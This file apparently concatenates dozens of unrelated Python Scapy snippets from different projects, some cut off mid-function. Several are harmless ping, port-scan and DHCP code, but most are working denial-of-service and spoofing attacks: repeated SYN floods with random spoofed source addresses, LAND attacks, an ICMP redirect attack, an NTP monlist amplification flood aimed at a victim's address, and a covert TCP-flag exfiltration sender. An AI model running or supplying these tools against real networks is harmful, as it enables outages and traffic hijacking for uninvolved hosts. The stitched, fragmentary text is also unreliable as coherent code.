def icmp_redirect(ip_gw, ip_victim, ip_attacker, ip_targetroute): """Try ICMP Redirect attack Args: ip_gw (str): Gateway IP ip_victim (str) : Target/Victim IP ip_attacker (str) : Attacker IP ip_targetroute (str) : IP of network to reach in ICMP payload interface ??? """ ip = IP() ip.src = ip_gw ip.dst = ip_victim icmp = ICMP() icmp.type = 5 icmp.code = 1 icmp.gw = ip_attacker ip2 = IP() ip2.src = ip_victim ip2.dst = ip_targetroute icmp2 = ICMP() icmp2.type = 0 icmp2.code = 0 # Send packets at Layer 3(Scapy creates Layer 2 header), Does not recieve any packets. send(ip / icmp / ip2 / icmp2, iface="eth1")
def run(self): # Damn, ugly! global forging if forging: i = IP() i.dst = ip if spoofing: i.src = '.'.join( random.randint(1, 254) for _ in range(4)) t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' try: send(i / t, verbose=0) except PermissionError: print('ohno, not forging') forging = False else: s = socket.socket() s.connect((self.ip, self.port))
def cmd_land(ip, count, port, iface, verbose): conf.verb = False if iface: conf.iface = iface layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def service_craft(pkt, fp, mac, service, type_=False): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.ttl, 16) ip.flags = 0x4000 tcp = TCP() tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport if type_: tcp.flags = 0x018 # PSH / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].ack data = service[pkt[TCP].dport] fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data return fin_pkt else: tcp.flags = 0x012 # SYN / ACK tcp.seq = pkt[TCP].seq tcp.ack = pkt[TCP].seq + 1 fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = ICMP() print "Spoofing %s to send ICMP ..." % i.src sr1(i/ICMP,verbose=0)
def seqgen_pkt_craft(pkt, fp, mac, pno): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['T1']['TTL'], 16) ip.flags = fp.probe['T1']['DF'] ip.id = fp.ip_id_gen() tcp = TCP() s_val = fp.probe['T1']['S'] if s_val == 'Z': tcp.seq = 0 elif s_val == 'A': tcp.seq = pkt[TCP].ack elif s_val == 'A+': tcp.seq = pkt[TCP].ack + 1 else: tcp.seq = fp.tcp_seq_gen() a_val = fp.probe['T1']['A'] if a_val == 'Z': tcp.ack = 0 elif a_val == 'S': tcp.ack = pkt[TCP].seq elif a_val == 'S+': tcp.ack = pkt[TCP].seq + 1 else: tcp.ack = pkt[TCP].seq + 369 flag_val = fp.probe['T1']['F'] tcp.flags = flag_val tcp.window = fp.probe['WIN']['W' + pno] tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport tcp.options = fp.probe['OPS']['O' + pno] rd_val = fp.probe['T1']['RD'] if rd_val != '0': crc = int(rd_val, 16) data = b'TCP Port is closed\x00' data += compensate(data, crc) fin_pkt = ip / tcp / data if ether is None else ether / ip / tcp / data else: fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def doSynFlood(origin_ip=None, origin_port=None, target_ip=None, target_port=None, interface=None, duration=None, gap=0): ''' Starts Syn Flood attacks Arguments: origin_ip (str): attacker ip origin_port (int): attacker port target_ip (str): target ip target_port (int): target port interface (str): network interface to use duration (int): duration of the attack gap (int): gap (delay) between packets Returns: None ''' # Check if everything is filled out if target_ip is None: return if target_port is None: return if duration is None: return if gap >= duration: return # Prepare the packet ip_layer = IP() ip_layer.src = origin_ip ip_layer.dst = target_ip tcp_layer = TCP() tcp_layer.sport = origin_port tcp_layer.dport = target_port tcp_layer.flags = "S" # Prepare timings time_start = time() time_end = time_start + duration # Start attack while (time() <= time_end): #duration # Constantly changing values tcp_layer.seq = GenerateRandomSafeSeq() tcp_layer.ack = GenerateRandomSafeSeq() tcp_layer.window = GenerateRandomWindow() attack_packet = ip_layer/tcp_layer # packet to send send(attack_packet, iface=interface) if gap > 0: sleep(gap) #gap
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = self.target t = ICMP() print "Spoofing %s to send ICMP ..." % i.src sr1(i / ICMP, verbose=0)
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: iface = search_iface(iface) if iface: conf.iface = iface['name'] else: logging.error( 'Interface {} not found. Use habu.interfaces to show valid network interfaces' .format(iface)) return False layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src="%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1,254), random.randint(1, 254), random.randint(1,254)) i.dst = self.target t = TCP() t.dport = self.port t.flags='S' print "Spoofing %s to send SYN ..." % i.src sr1(i/t,verbose=0)
def syn_flood(self, target, port): from scapy.all import IP, TCP, send i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65500) t.dport = port t.flags = 'S' send(i / t, verbose=0)
def udp_craft(pkt, mac, fp): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['U1']['TTL'], 16) ip.flags = fp.probe['U1']['DF'] ip.len = 56 ip.id = 4162 icmp = ICMP() icmp.type = 3 icmp.unused = 0 icmp.code = 13 # code 3 for reply iperror = IPerror() iperror.proto = 'udp' iperror.ttl = 0x3E iperror.len = fp.probe['U1']['RIPL'] iperror.id = fp.probe['U1']['RID'] ripck_val = fp.probe['U1']['RIPCK'] if ripck_val == 'G': pass elif ripck_val == 'Z': iperror.chksum = 0 else: iperror.chksum = pkt[IP].chksum udperror = UDPerror() udperror.sport = pkt[UDP].sport udperror.dport = pkt[UDP].dport udperror.len = pkt[UDP].len if fp.probe['U1']['RUCK'] == 'G': udperror.chksum = pkt[UDP].chksum else: udperror.chksum = fp.probe['U1']['RUCK'] try: ipl = int(fp.probe['U1']['IPL'], 16) except KeyError: ipl = None data = pkt[Raw].load fin_pkt = ip / icmp / iperror / udperror / data if ether is None else ether / ip / icmp / iperror / udperror / data return fin_pkt
def cmd_ping(ip, interface, count, timeout, wait, verbose): """The classic ping tool that send ICMP echo requests. \b # habu.ping 8.8.8.8 IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding """ if interface: conf.iface = interface conf.verb = False conf.L3socket=L3RawSocket layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del(ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
def cmd_icmp_ping(ip, interface, count, timeout, wait, verbose): """The classic ping tool that send ICMP echo requests. \b # habu.icmp.ping 8.8.8.8 IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding """ if interface: conf.iface = interface conf.verb = False conf.L3socket = L3RawSocket layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del (ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
def run(self): i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = self.target t = TCP() t.sport = random.randint(1, 65535) t.dport = self.port t.flags = 'S' send(i / t, verbose=0)
def run(self): print "Starting %s %s %d" % (self.name, self.target, self.port) i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = self.target t = TCP() t.dport = self.port t.flags = 'S' print "Spoofing %s to send SYN ..." % i.src sr1(i / t, verbose=0)
def run(self): i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint( 1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65535) t.dport = port t.flags = 'S' send(i/t, verbose=0)
def send_data(self, bytestream): if self.verbose(): print("Exfiltrating " + repr(bytestream.decode('us-ascii'))) packet = IP() / TCP() packet.dst = self.host() packet.dport = self.dest_port() packet.sport = self.source_port() packet.getlayer(TCP).flags = 0x20 | 0x02 # URG & SYN packet.urgptr = self.int_for(bytestream) if self.verbose(): packet.show() send(packet, verbose=self.verbose())
def ntp_amplification(): global g_target_ip, g_ntp_servers # Create the NTP request ip = IP(src = g_target_ip) udp = UDP(sport = RandShort(), dport = 123) ntp = NTPPrivate(mode = 7, implementation = "XNTPD", request_code = "REQ_MON_GETLIST_1") while True: # Send the request to each of the NTP servers for ntp_ip in g_ntp_servers: ip.dst = ntp_ip packet = ip/udp/ntp send(packet)
def run(self): packet_ip = IP() packet_ip.src = "{}.{}.{}.{}".format(random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) packet_ip.dst = self.host packet_tcp = TCP() packet_tcp.sport = random.randint(1024, 65535) packet_tcp.dport = self.port packet_tcp.flags = 'S' send(packet_ip/packet_tcp)
def cmd_land(ip, count, port, iface, verbose): """This command implements the LAND attack, that sends packets forging the source IP address to be the same that the destination IP. Also uses the same source and destination port. The attack is very old, and can be used to make a Denial of Service on old systems, like Windows NT 4.0. More information here: https://en.wikipedia.org/wiki/LAND \b # sudo habu.land 172.16.0.10 ............ Note: Each dot (.) is a sent packet. You can specify how many packets send with the '-c' option. The default is never stop. Also, you can specify the destination port, with the '-p' option. """ conf.verb = False if iface: conf.iface = iface layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def ecn_craft(pkt, mac, fp): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['ECN']['TTL'], 16) ip_flag = fp.probe['ECN']['DF'] if ip_flag == 'Y': ip.flags = 2 else: ip.flags = 0 ip.id = fp.ip_id_gen() tcp = TCP() w_val = fp.probe['ECN']['W'] if w_val == 'ECHOED': tcp.window = pkt[TCP].window else: tcp.window = w_val tcp.sport = pkt[TCP].dport tcp.dport = pkt[TCP].sport cc_val = fp.probe['ECN']['CC'] if cc_val == 'Y': tcp.flags = 0x52 elif cc_val == 'N': tcp.flags = 0x12 elif cc_val == 'S': tcp.flags = 0xD2 else: tcp.flags = 0x10 o_val = fp.probe['ECN']['O'] if o_val == 'EMPTY': pass else: tcp.options = o_val fin_pkt = ip / tcp if ether is None else ether / ip / tcp return fin_pkt
def IP_layer(attributes): layer3 = IP() layer3.version = attributes['version'] layer3.ihl = attributes['ihl'] layer3.tos = attributes['tos'] layer3.len = attributes['len'] layer3.id = attributes['id'] layer3.flags = attributes['flags'] layer3.frag = attributes['frag'] layer3.ttl = attributes['ttl'] layer3.proto = attributes['proto'] layer3.src = attributes['src'] layer3.dst = attributes['dst'] return layer3
def three_way_handshake(ip_dst, sniffer, port_num): ip = IP(ttl=255) ip.src = MY_IP ip.dst = ip_dst tcp = TCP( sport=port_num, dport=443, flags='S', seq=1000, window=65535, options=[("MSS", MSS_SIZE), ('WScale', 10)]) SYNACK = sr1(ip / tcp, verbose=False, timeout=2) if not SYNACK: return "NOSYNACK" tls = TLSRecord() / TLSHandshakes(handshakes=[ TLSHandshake() / TLSClientHello( compression_methods=list(range(0xff))[::-1], cipher_suites=list(range(0xff))) ]) tls_raw = str(tls) ptr = 0 current_ack = SYNACK.ack if SYNACK.seq is None: return "SYNACKERROR" while ptr < len(tls_raw): ACK = TCP( sport=port_num, dport=443, flags='A', seq=current_ack, ack=SYNACK.seq + 1, window=65535, options=[("MSS", MSS_SIZE), ('WScale', 10)]) tls_frag = tls_raw[ptr:ptr + MSS_SIZE] send(ip / ACK / tls_frag, verbose=False) ptr += MSS_SIZE current_ack += len(tls_frag) sniffer.client_hello_sent = True return "SUCCESS"
def cmd_ping(ip, interface, count, timeout, wait, verbose): if interface: conf.iface = interface conf.verb = False conf.L3socket = L3RawSocket layer3 = IP() layer3.dst = ip layer3.tos = 0 layer3.id = 1 layer3.flags = 0 layer3.frag = 0 layer3.ttl = 64 layer3.proto = 1 # icmp layer4 = ICMP() layer4.type = 8 # echo-request layer4.code = 0 layer4.id = 0 layer4.seq = 0 pkt = layer3 / layer4 counter = 0 while True: ans = sr1(pkt, timeout=timeout) if ans: if verbose: ans.show() else: print(ans.summary()) del (ans) else: print('Timeout') counter += 1 if count != 0 and counter == count: break sleep(wait) return True
def is_port_open(ip_addr, port, timeout=5, verbose=False): ip = IP() ip.dst = ip_addr syn = TCP() syn.sport = choice(range(1000, 50000)) syn.dport = port syn.flags = 'S' syn.seq = 1 packet = ip/syn synack = sr1(packet, timeout=timeout, verbose=verbose) if synack and synack.sprintf('%TCP.flags%') == 'SA': return True return False
def sendSYN(host, port): # Create an IP Packet using random ip as source and the target IP as destination ipPacket = IP() ipPacket.src = ".".join( map(str, (random.randint(0, 255) for i in range(4)))) ipPacket.dst = host # Create a TCP segment using a random source port and the target port as the destination tcpSegment = TCP() tcpSegment.sport = random.randint(1000, 65535) tcpSegment.dport = port # Set the syn flag tcpSegment.flags = 'S' # Send the composition of the two (package/segment) and ignore the result send(ipPacket / tcpSegment, verbose=0) pass
def flood(target): IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose = False) except Exception as e: print(f"{Fore.MAGENTA}Error while sending SYN packet\n{Fore.MAGENTA}{e}{Fore.RESET}") else: print(f"{Fore.GREEN}[+] {Fore.YELLOW}SYN packet sent to {'{}:{}'.format(*target)}.{Fore.RESET}")
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose): conf.verb = False if interface: conf.iface = interface layer2 = Ether() layer3 = IP() layer3.dst = ip layer4 = TCP() layer4.dport = port pkt = layer2 / layer3 / layer4 counter = 0 print("Please, remember to block your RST responses", file=sys.stderr) while True: if forgeip: pkt[IP].src = "%s.%s" % (pkt[IP].src.rsplit( '.', maxsplit=1)[0], randint(1, 254)) if forgemac: pkt[Ether].src = RandMAC() pkt[TCP].sport = randint(10000, 65000) if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() sendp(pkt) counter += 1 if count != 0 and counter == count: break return True
def syn_flood(ip_destination, port_destination, limit): total = 0 print("Enviando Pacotes") for x in range(0, limit): ip_packet = IP() ip_packet.src = ".".join( map(str, (random.randint(0, 255) for _ in range(4)))) ip_packet.dst = ip_destination tcp_packet = TCP() tcp_packet.sport = random.randint(1000, 9000) tcp_packet.dport = port_destination tcp_packet.flags = "S" tcp_packet.seq = random.randint(1000, 9000) tcp_packet.window = random.randint(1000, 9000) print("Source: " + ip_packet.src + ":" + str(tcp_packet.sport)) send(ip_packet / tcp_packet, verbose=0) total += 1 print("All packets sent")
def icmp_craft(pkt, fp, mac): try: ether = Ether() ether.src = mac ether.dst = pkt[Ether].dst ether.type = 0x800 except IndexError: ether = None ip = IP() ip.src = pkt[IP].dst ip.dst = pkt[IP].src ip.ttl = int(fp.probe['IE']['TTL'], 16) dfi_flag = fp.probe['IE']['DFI'] if dfi_flag == 'N': ip.flags = 0 elif dfi_flag == 'S': ip.flags = pkt[IP].flags elif dfi_flag == 'Y': ip.flags = 2 else: ip.flags = 0 if pkt[IP].flags == 2 else 2 ip.id = fp.ip_id_icmp_gen() icmp = ICMP() icmp.type = 0 icmp.id = pkt[ICMP].id cd_val = fp.probe['IE']['CD'] if cd_val == 'Z': icmp.code = 0 elif cd_val == 'S': icmp.code = pkt[ICMP].code else: icmp.code = random.randint(0, 15) icmp.seq = pkt[ICMP].seq data = pkt[ICMP].payload fin_pkt = ip / icmp / data if ether is None else ether / ip / icmp / data return fin_pkt
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(f"[{red} bold][✘] ERROR[/{red} bold] " + f"[{yellow}]while sending SYN packet[/{yellow}]\n{e}") else: print(f"[{green}][✔] SUCCESS[/{green}] " + f"[{yellow}]SYN packet sent to[{yellow}] " + f"[{blue}]{'{}:{}'.format(*target)}")
def syn_flood(): global FINISH while True: if FINISH: break IP_Packet = IP() IP_Packet.src = randomData.random_IP() IP_Packet.dst = target_ip TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target_port TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print(e) else: print("[+] SYN packet sent!")
def flood(target): IP_Packet = IP() IP_Packet.src = random_IP() IP_Packet.dst = target[0] TCP_Packet = TCP() TCP_Packet.sport = random.randint(1000, 10000) TCP_Packet.dport = target[1] TCP_Packet.flags = "S" TCP_Packet.seq = random.randint(1000, 10000) TCP_Packet.window = random.randint(1000, 10000) for _ in range(16): try: send(IP_Packet / TCP_Packet, verbose=False) except Exception as e: print( f"\033[1m{cs('[✘] ERROR', red)}\033[0m {cs('while sending SYN packet', yellow)}\n{e}" ) else: print( f"{cs(f'[✔] SUCCESS', green)} {cs(f'SYN packet sent to', yellow)} {blue}{'{}:{}'.format(*target)}\033[0m" )
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose): """Launch a lot of TCP connections and keeps them opened. Some very old systems can suffer a Denial of Service with this. Reference: https://en.wikipedia.org/wiki/SYN_flood Example: \b # sudo habu.synflood 172.16.0.10 ................. Each dot is a packet sent. You can use the options '-2' and '-3' to forge the layer 2/3 addresses. If you use them, each connection will be sent from a random layer2 (MAC) and/or layer3 (IP) address. You can choose the number of connections to create with the option '-c'. The default is never stop creating connections. Note: If you send the packets from your real IP address and you want to keep the connections half-open, you need to setup for firewall to don't send the RST packets. """ conf.verb = False if interface: conf.iface = interface layer2 = Ether() layer3 = IP() layer3.dst = ip layer4 = TCP() layer4.dport = port pkt = layer2 / layer3 / layer4 counter = 0 print("Please, remember to block your RST responses", file=sys.stderr) while True: if forgeip: pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254)) if forgemac: pkt[Ether].src = RandMAC() pkt[TCP].sport = randint(10000, 65000) if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() sendp(pkt) counter += 1 if count != 0 and counter == count: break return True
import sys from scapy.all import sr1, IP, TCP, UDP, ICMP # User must supply host and port if len(sys.argv) < 3: print "Invalid syntax: ps.py [-u -t -i] <target IP> <p1[ p2 p3 ...]>" else: # TCP SYN if sys.argv[1] == "-t": print "TCP SYN scan on host " + sys.argv[2] + "\n" ip = IP() tcp = TCP() # cast as str and int to avoid issues caused by periods ip.dst = str(sys.argv[2]) # loop iterates through as many commandline arguments were given for port in range(len(sys.argv) - 3): print "Scanning port " + str(sys.argv[port + 3]) # port+3 is start of ports tcp.dport = int(sys.argv[port + 3]) # send SYN packet tcp.flags = "S" packet = (ip / tcp) # verbose=0 to limit console output; timeout 1s status = sr1(packet, verbose=0, timeout=1) if status: print str(packet.dport) + " is open\n" # UDP elif sys.argv[1] == "-u": print "UDP scan on host " + sys.argv[2] + "\n"
53, # dns 443, # https 110, # pop3 445, # ms-ds 8080, # tomcat 4567, # filenail (commonly open port for backdoors) ] # try each common port until one responds for port in common_ports: # assemble IP packet with target IP ip = IP() ip.dst = target_ip # assemble TCP with dst port and SYN flag set tcp = TCP() tcp.dport = port tcp.flags = 'S' print('Trying port %d' % port) # send the packet and wait 2 seconds for an answer rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0) # if answered no need to try more ports
if cpid: # the sending process sleep(5) # to make sure that the other process started listening for packets if ip6 == False: pkt = IP(dst = int2addr(addrbeg,ip6))/TCP(sport = 1026, dport = port) else: pkt = IPV6(dst = int2addr(addrbeg,ip6))/TCP(sport = 1026, dport = port) host = addrbeg try: while host <= addrend: ip = int2addr(host , ip6) pkt.dst = ip # FIXME pkt.seq = seqgen(ip+":"+str(port)+salt) send(pkt) host+=1 os.wait() except: os.kill(cpid,15) else: # this is the listening and printing process try: sniff(filter = "ip and tcp", lfilter = lambda x: checkpkt(x)) except: pass
A very basic script to send a DHCP Discover message. Capture the packages to see what's wrong. """ import scapy from scapy.sendrecv import sendp, sniff from scapy.all import DHCP, ARP, BOOTP, Ether, UDP, TCP, IP # data link layer ethernet = Ether() ethernet.show() ethernet.dst = "ff:ff:ff:ff:ff:ff" # network layer ip = IP() ip.show() ip.dst = "255.255.255.255" # transport layer udp = UDP() udp.show() udp.sport = 68 udp.dport = 67 # application layer bootp = BOOTP() bootp.show() bootp.flags = 1 dhcp = DHCP() dhcp.show() dhcp.options = [("message-type", "discover"), "end"]
#*** Get parameters from command line SRC_MAC = sys.argv[1] DST_MAC = sys.argv[2] SRC_IP = sys.argv[3] DST_IP = sys.argv[4] IF_NAME = sys.argv[5] REPEAT_INTERVAL = float(sys.argv[6]) REPEAT_COUNT = int(sys.argv[7]) data = "blahblahblah" # define ip and icmp eth = Ether() eth.src=SRC_MAC eth.dst=DST_MAC ip = IP() ip.src = SRC_IP ip.dst = DST_IP icmp = ICMP() icmp.type = 8 icmp.code = 0 finished = 0 count = 0 while not finished: sendp(eth/ip/icmp/data, iface=IF_NAME) time.sleep(REPEAT_INTERVAL) count += 1 if count >= REPEAT_COUNT: finished = 1
53, # dns 443, # https 110, # pop3 445, # ms-ds 8080, # tomcat 4567, # filenail (commonly open port for backdoors) ] # try each common port until one responds for port in common_ports: # assemble IP packet with target IP ip = IP() ip.dst = target_ip # assemble TCP with dst port and SYN flag set tcp = TCP() tcp.dport = port tcp.flags = 'S' print 'Trying port %d' % port # send the packet and wait 2 seconds for an answer rcv_pkt = sr1(ip / tcp, timeout=2, verbose=0) # if answered no need to try more ports